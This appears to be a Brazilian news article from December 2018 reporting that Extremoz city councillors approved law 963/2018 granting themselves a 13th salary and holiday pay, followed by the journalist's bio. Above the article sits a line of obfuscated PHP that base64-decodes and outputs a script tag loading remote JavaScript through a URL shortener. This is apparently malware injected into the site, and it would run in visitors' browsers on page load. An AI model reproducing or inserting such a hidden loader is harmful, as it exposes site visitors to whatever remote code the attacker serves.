$str = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vaXMuZ2QvR2dHZjl6P3Y9djI1LjAiPjwvc2NyaXB0Pg=='; echo base64_decode($str);

Vereadores de Extremoz criam décimo terceiro para eles próprios

Vereadores de Extremoz criam décimo terceiro para eles próprios
25 Dez 2018

A Câmara Municipal de Extremoz criou e aprovou a lei 963/2018 que autoriza a concessão de férias e 13º aos vereadores de Extremoz.

Com essa lei os vereadores passarão a receber 1/12 dos seus subsídios, por mês de efetivo exercício no respectivo ano, conforme artigo primeiro da lei.

A lei também estabelece o prazo para os vereadores receberem o 13º salário, que poderá ser pagos em duas parcelas; a primeira realizada até o dia 30 de junho e a segunda até o dia 20 de dezembro de cada ano, conforme paragrafo terceiro do artigo primeiro.

Eles também passarão a receber valores referentes as férias, que corresponde a 1/3 dos seus subsídios. As férias corresponderão ao recesso do mês de janeiro.

O prefeito Joaz Oliveira promulgou a lei no dia 20 de dezembro. Atualmente o salário dos vereadores de Extremoz é R$ 6.000

share

Anna Ruth
Anna Ruth

Anna Ruth Dantas é jornalista, apresentadora do programa RN Acontece, da Band Natal; produz e apresenta o programa Jornal da Cidade, da Rádio Cidade (94 FM - Natal), e apresenta o programa Panorama do RN (em rede com 16 emissoras de rádio do Rio Grande do Norte). Jornalista de grande credibilidade, atua também como consultora e ministra cursos de midia trainning na Trilhar Educação Corporativa.

Deixar uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *